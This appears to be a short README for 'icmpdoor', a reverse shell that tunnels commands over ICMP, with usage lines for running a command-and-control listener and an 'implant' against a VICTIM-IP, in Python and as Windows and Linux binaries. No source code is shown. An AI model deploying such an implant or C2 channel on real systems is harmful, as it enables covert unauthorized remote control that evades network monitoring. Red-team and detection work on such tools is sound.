An ICMP rev shell written in Python3 and scapy
icmpdoor – ICMP Reverse Shell
icmpdoor is an ICMP rev shell written in Python3 and scapy. Tested on Ubuntu 20.04, Debian 10 (Kali Linux), and Windows 10.
Python version usage (both Windows and Linux):
./ -i INTERFACE -d VICTIM-IP (Command and Control)
./ -i INTERFACE -d CNC-IP (Implant)
Binary Windows version usage version:
./icmp-cnc.exe -d VICTIM-IP (Command and Control)
./icmpdoor.exe -d CNC-IP (Implant)
Binary Linux version usage version:
./icmp-cnc -d VICTIM-IP (Command and Control)
./icmpdoor -d CNC-IP (Implant)
Parameters details:
-h, --help show this help message and exit
Listener (virtual) Network Interface (e.g. eth0)
Destination IP address
exit Exit Command and Control (E2)
Screenshot 1 and 2 shows how